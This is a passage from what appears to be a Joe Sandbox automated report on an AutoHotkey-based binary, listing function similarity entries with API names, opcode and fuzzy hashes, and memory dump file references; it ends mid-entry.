                            • Instruction ID: b62562f51cc92bbdefb8ab62754dc33ccd560dd2fbf1db1699b1f88b8013b1f5
                            • Opcode Fuzzy Hash: 1a0d1250352621168d7a7ac3eb71bbd26c2c29c609b7ee303e5093b7f09285f7
                            • Instruction Fuzzy Hash: 60616372104B808AF766CF26F8407E977A1F38CB98F544126EB8A47BB5DB34C581CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$free$Message
                            • String ID: call
                            • API String ID: 1247145397-3431870270
                            • Opcode ID: 85139e07a413c257b78a03f2f182c30657dad2e1a47e31428406810441b3b56c
                            • Instruction ID: 712e2a35f15f2a0e6bdc36c4cd5952dcac5668871b40faf330a5c43b24daa7ee
                            • Opcode Fuzzy Hash: 85139e07a413c257b78a03f2f182c30657dad2e1a47e31428406810441b3b56c
                            • Instruction Fuzzy Hash: 05616172204B809AF766CF26F8447E937A1F38CB98F544126EB8A47AB5DB35C581CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Messagewcsncpy$Post
                            • String ID: AutoHotkey v1.1.37.01
                            • API String ID: 36970114-194712299
                            • Opcode ID: 84b615c64389e203d2d201617b87cb392f15ef37e8127bd5d923b6c913bdcd5d
                            • Instruction ID: 5688fba3567768b6dcbace76990945fea99225c1f65dfc4665573bddbe8d01b5
                            • Opcode Fuzzy Hash: 84b615c64389e203d2d201617b87cb392f15ef37e8127bd5d923b6c913bdcd5d
                            • Instruction Fuzzy Hash: 7331C872614AC485E7339F26E4407DD73A0FB6DBC4F098225EB8417AB4DB38C185CB44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$DragFinishMessage
                            • String ID:
                            • API String ID: 1078106488-0
                            • Opcode ID: 55325afd3fdf9f8fe719bae6391a7b1363c530a7b8b6d11aa44296cce7b320f5
                            • Instruction ID: 97b0d1c69dd79f3c75ef6655f5bbadf9128436a32aa2beb7238ed56fbc316f89
                            • Opcode Fuzzy Hash: 55325afd3fdf9f8fe719bae6391a7b1363c530a7b8b6d11aa44296cce7b320f5
                            • Instruction Fuzzy Hash: 03B16CB2205A808AFB67CF27A8547ED77A5F78DBD8F144116EB5A47AB5CB34C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$DragFinishMessage
                            • String ID:
                            • API String ID: 1078106488-0
                            • Opcode ID: 6f3a57de0b8694bc2c6a0ba5a60554a18b0220b10c4f7fe02d0a8cecdbf94fa4
                            • Instruction ID: f9baf5945d45696ac31674e60e141ca7a6a12bd6c1fbb670ea1c80e55695b0d5
                            • Opcode Fuzzy Hash: 6f3a57de0b8694bc2c6a0ba5a60554a18b0220b10c4f7fe02d0a8cecdbf94fa4
                            • Instruction Fuzzy Hash: 4FA15DB2605A808AEB67CF27A9503E977A1F38DBD8F144116EB9617AF5CB34C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: DragFinish
                            • String ID:
                            • API String ID: 1853471036-0
                            • Opcode ID: 942ba5d639d23460ad9085152eaf73a7886cc4f7a9ca18a364282befeccaab16
                            • Instruction ID: 3c476a18d10ba3b814ec87d4f28c894b0dfb19c2eb6b658983351ad65640819b
                            • Opcode Fuzzy Hash: 942ba5d639d23460ad9085152eaf73a7886cc4f7a9ca18a364282befeccaab16
                            • Instruction Fuzzy Hash: 56916D72205A808AFB67CF27B8503E977A0F78DBD4F154226EB5A47AB5DB34C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$DragFinishMessagewcsncpy
                            • String ID:
                            • API String ID: 1341528516-0
                            • Opcode ID: f6dc6227e1352179419a2fc68deb7848634684301bc41a2a2d4528834fdecf1a
                            • Instruction ID: d1d7c1faaf6baa5902af4a5dbec2ce6e0e54dbd4741f2d7ec8b86ac4178e3ddf
                            • Opcode Fuzzy Hash: f6dc6227e1352179419a2fc68deb7848634684301bc41a2a2d4528834fdecf1a
                            • Instruction Fuzzy Hash: C0815D72605A818AFB67CF27B8503E977A4F38DB98F144216EB5A476F5CB34C881C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ClipboardCloseCurrentEnumGlobalProcessTimerUnlockWindows
                            • String ID:
                            • API String ID: 555064778-0
                            • Opcode ID: 122f0086822fe55000f8ee644d42007e11c9274c692e3ca629be843e9de11bc1
                            • Instruction ID: ab13099335ea4c18d4202fbfe90588f7f8542d52cd688e17405bc56db2a0250f
                            • Opcode Fuzzy Hash: 122f0086822fe55000f8ee644d42007e11c9274c692e3ca629be843e9de11bc1
                            • Instruction Fuzzy Hash: D3210436205A8685EB56DF63A8807E973A4F74CBE1F584426EB4967634DE78C885C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$free$Message
                            • String ID:
                            • API String ID: 1247145397-0
                            • Opcode ID: 31caa77e5fc26299c92a5d1d7da4bef28b2147d2384a5cb6415aa9bba25e299f
                            • Instruction ID: 93ff463c755829dd5f46b0f84b3be2c0b08701a00e744aebaf331863275f3ab7
                            • Opcode Fuzzy Hash: 31caa77e5fc26299c92a5d1d7da4bef28b2147d2384a5cb6415aa9bba25e299f
                            • Instruction Fuzzy Hash: AE518372205B809AF766CF26F8407E937A1F78CB98F144126EB9A47AB5DB34C581CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$FocusMessage
                            • String ID:
                            • API String ID: 3376117608-0
                            • Opcode ID: 4ed854001584b0010d3e3320374878ea06acf23f7a43639987cc36095f5ae0a5
                            • Instruction ID: 96400dc4a226dfce3f9499920e439daa3eda86c85f85cc2c0892fc1073da92ee
                            • Opcode Fuzzy Hash: 4ed854001584b0010d3e3320374878ea06acf23f7a43639987cc36095f5ae0a5
                            • Instruction Fuzzy Hash: CD517476104B809AFB56CF26F8447E937B1F38CB98F144126EB4A47AB5DB34C881CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$FocusMessage
                            • String ID:
                            • API String ID: 3376117608-0
                            • Opcode ID: 54760836877d7ea308679fc2fbb067974d626e52727a4783f1aca292cb012f38
                            • Instruction ID: 1d9cf0d1ea3328361e376251e09c355349c8605a82263f8f977a84d7874d0cf4
                            • Opcode Fuzzy Hash: 54760836877d7ea308679fc2fbb067974d626e52727a4783f1aca292cb012f38
                            • Instruction Fuzzy Hash: 58417572104B809AFB57CF26F8447E937A1F38CB98F144126EB8A476B5CB34C481C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$FocusMessage
                            • String ID:
                            • API String ID: 3376117608-0
                            • Opcode ID: 4d53974599876ddbb9f9464b9af5ec3fa2cf139bde48eb46c203a091238854c5
                            • Instruction ID: c00b3f6a235106adfd11c9eb9a3479aa55852c5f21b5728f409e2f6cedb87129
                            • Opcode Fuzzy Hash: 4d53974599876ddbb9f9464b9af5ec3fa2cf139bde48eb46c203a091238854c5
                            • Instruction Fuzzy Hash: BF416572104B809AFB56CF26F8447E937B1F38CB98F144126EB59576B5DB34C882CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$FocusMessage
                            • String ID:
                            • API String ID: 3376117608-0
                            • Opcode ID: 5585bd4884c88b14856f6c5918247512757e0af3403f24648fc02b6e71661c6d
                            • Instruction ID: 72dcdbc92e0911e82faed9774c6c93b0f2e28b023da8ec5053ba2a971698630e
                            • Opcode Fuzzy Hash: 5585bd4884c88b14856f6c5918247512757e0af3403f24648fc02b6e71661c6d
                            • Instruction Fuzzy Hash: 2F417572500B809AFB56CF26F8447E937A1F38CB98F544126EB89476B5CB34C482CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$FocusMessage
                            • String ID:
                            • API String ID: 3376117608-0
                            • Opcode ID: f7dcb1930cb5a3408f50ff76016e259487bff21e9fe9a28c4a4b5ad6d9a8c87c
                            • Instruction ID: 8b53cbedab81bcd5b9f3a4f9950f157438ee224153062015c5a9ad03a605ad92
                            • Opcode Fuzzy Hash: f7dcb1930cb5a3408f50ff76016e259487bff21e9fe9a28c4a4b5ad6d9a8c87c
                            • Instruction Fuzzy Hash: 13416476204B809AFB56CF26F8447E937B1F78CB98F144126EB4A476B5DB34C881CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$FocusMessage
                            • String ID:
                            • API String ID: 3376117608-0
                            • Opcode ID: 991ffd40ac100a4ba6478e013dde0f04d33180e20079b1e8aaaa70b2475bac0d
                            • Instruction ID: 86597d57194dd46d7ca2aafd131a1ac5cf91cbab4cbabef65b80b4e37553b4b4
                            • Opcode Fuzzy Hash: 991ffd40ac100a4ba6478e013dde0f04d33180e20079b1e8aaaa70b2475bac0d
                            • Instruction Fuzzy Hash: 9A416372204B409AFB56CF26F8447E937B1F38CB98F144126EB5A476B5DB34C882CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$FocusMessage
                            • String ID:
                            • API String ID: 3376117608-0
                            • Opcode ID: 840e2d34c6706b51fc9c97a4876a3a34968ad10c8a815e74e2b874ffe0587265
                            • Instruction ID: 833c8a3268c0e59174655066acb5579dcf7dbfa1f375bf83d9f7f9c2cb783a3d
                            • Opcode Fuzzy Hash: 840e2d34c6706b51fc9c97a4876a3a34968ad10c8a815e74e2b874ffe0587265
                            • Instruction Fuzzy Hash: 1F417472204B809AFB57CF26F8447E937A1F78CB98F544126EB8A476B5DB34C482CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$FocusMessage
                            • String ID:
                            • API String ID: 3376117608-0
                            • Opcode ID: 1b88ecbd4deb658c739f3eb206a05c8ac732cac7e523ba7eda7e96a849464d4a
                            • Instruction ID: 15d1fd9c278a1e8abce026d9dc8c83d48ef7363a4f000ae638376cc6de7c1593
                            • Opcode Fuzzy Hash: 1b88ecbd4deb658c739f3eb206a05c8ac732cac7e523ba7eda7e96a849464d4a
                            • Instruction Fuzzy Hash: 47415272205B409AFB57CF26F8447E937A1F78CB98F544126EB5A476B5DB34C982CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: _errno$_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 2819658684-0
                            • Opcode ID: 9e98120a8e195555edf72ad120129c45298068f11f99e9964a534d5c9f1f3217
                            • Instruction ID: 6c0f50bdd69dee1bb8179626f5a25cec43013e73bb7d52ea302060589ff88690
